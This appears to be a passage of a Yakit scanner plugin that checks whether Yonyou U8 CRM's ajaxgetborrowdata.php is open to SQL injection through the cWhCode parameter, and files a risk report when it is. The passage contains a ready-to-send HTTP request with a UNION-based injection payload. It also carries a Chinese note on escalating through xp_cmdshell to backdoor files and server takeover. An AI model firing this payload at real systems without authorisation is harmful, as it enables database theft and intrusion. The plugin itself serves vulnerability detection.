任意SQL语句;在后端为 SQL Server、注入点使用的数据库账号具备 sysadmin 权限且 xp_cmdshell 已启用(默认关闭,需 sp_configure 开启)的前提下,还可调用 xp_cmdshell 写入后门文件、执行任意代码,从而获取到服务器权限。
// Initialise the yakit client first so the yakit.Info / risk.NewRisk calls made
// further down have an engine to report back to.
yakit.AutoInitYakit()
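handleCheck = func(target, port) {
    // Probe a single host:port for the Yonyou U8 CRM ajaxgetborrowdata.php SQL
    // injection in the cWhCode parameter and file a risk when the response looks
    // vulnerable. DontCheckLogin=1 and the fixed PHPSESSID cookie are part of the
    // original probe request and are sent unchanged.
    addr = str.HostPort(target, port)
    isTls = str.IsTLSServer(addr)

    // The UNION payload selects one string literal assembled from CHAR() calls:
    // sqlmap-style delimiters "qqvjq" / "qxzbq" around a random body. When the
    // injected query executes and the endpoint echoes query output, this exact
    // string shows up in the response body — that is the strong signal, far more
    // specific than a generic "success" flag.
    echoMarker = `qqvjqcirWxJBjUbVJKDlcrZCJrILMeFzXVgQckADCULOzqxzbq`

    // Raw request. Lines inside the raw string must stay at column 0; indenting
    // them changes the bytes on the wire. The empty line between "Connection:"
    // and "cWhCode=" is required: it is the header/body separator, and without
    // it the payload is not sent as the form body.
    packet1 = `POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getWarehouseOtherInfo HTTP/1.1
Host: {{params(target)}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

cWhCode=1%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2899%29%2BCHAR%28105%29%2BCHAR%28114%29%2BCHAR%2887%29%2BCHAR%28120%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%28106%29%2BCHAR%2885%29%2BCHAR%2898%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2875%29%2BCHAR%2868%29%2BCHAR%28108%29%2BCHAR%2899%29%2BCHAR%28114%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2873%29%2BCHAR%2876%29%2BCHAR%2877%29%2BCHAR%28101%29%2BCHAR%2870%29%2BCHAR%28122%29%2BCHAR%2888%29%2BCHAR%2886%29%2BCHAR%28103%29%2BCHAR%2881%29%2BCHAR%2899%29%2BCHAR%28107%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%2867%29%2BCHAR%2885%29%2BCHAR%2876%29%2BCHAR%2879%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29--+KRVC`

    rsp, req, err = poc.HTTP(
        packet1,
        poc.params({"target": addr}),
        poc.https(isTls),
        poc.redirectTimes(0),
    )
    if err != nil {
        // Transport failure (refused, timeout, TLS handshake): nothing to judge,
        // and silently dropping the error hides scan coverage gaps.
        yakit.Info("%v request failed: %v", addr, err)
        return
    }

    // Baseline verdict inherited from the original probe: HTTP 200 plus
    // `"success": true`. NOTE(review): the endpoint may answer this way to any
    // well-formed request, so on its own this is a weak signal. It is kept as
    // the trigger so existing detections do not regress; the marker check below
    // grades confidence instead of changing what fires.
    statusOK = str.MatchAllOfSubString(rsp, `HTTP/1.1 200`)
    successFlag = str.MatchAllOfSubString(rsp, `"success": true`)
    if !statusOK || !successFlag {
        return
    }

    // Strong evidence: the injected literal came back, i.e. the UNION branch was
    // executed by the database. Whether this endpoint ever echoes query output
    // is not confirmed here, which is why a missing marker lowers confidence
    // rather than suppressing the finding.
    markerEchoed = str.MatchAllOfSubString(rsp, echoMarker)
    verdict = "响应状态码 200 且响应内容存在 `{\"success\": true}`"
    if markerEchoed {
        verdict = verdict + ",并且响应中回显了注入的标记字符串 `" + echoMarker + "`(联合查询已被数据库执行,可信度高)"
    } else {
        verdict = verdict + ",但响应中未回显注入的标记字符串 `" + echoMarker + "`,该判定仅基于 success 标志,建议人工确认以排除误报"
    }

    yakit.Info("%v found 用友U8 CRM ajaxgetborrowdata.php SQL注入漏洞", addr)
    risk.NewRisk(
        addr,
        risk.title("用友U8 CRM ajaxgetborrowdata.php SQL注入漏洞"),
        risk.severity("high"),
        risk.titleVerbose("用友U8 CRM ajaxgetborrowdata.php SQL注入漏洞"),
        risk.request(string(req)),
        risk.response(string(rsp)),
        risk.cve("no cve"),
        risk.details("发现用友U8 CRM ajaxgetborrowdata.php 存在SQL注入漏洞,漏洞点为 cWhCode 参数,**通过" + verdict + "判断漏洞存在**。攻击者可以利用此漏洞执行任意SQL语句,获取数据库敏感信息。\n\n**漏洞复现请求:**\n```\n" + string(req) + "\n```\n\n**漏洞复现响应:**\n```\n" + string(rsp) + "\n```"),
    )
    return
}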
handle = func(result /* *fp.MatchResult */) {
    // Port-scan callback. Only an open port that produced at least one HTTP
    // flow during fingerprinting is worth probing; everything else is dropped.
    // The short-circuit keeps Fingerprint from being touched on closed ports,
    // exactly as the separate guards did before.
    worthProbing = result.IsOpen() && len(result.Fingerprint.HttpFlows) > 0
    if !worthProbing {
        return
    }
    handleCheck(result.Target, result.Port)
}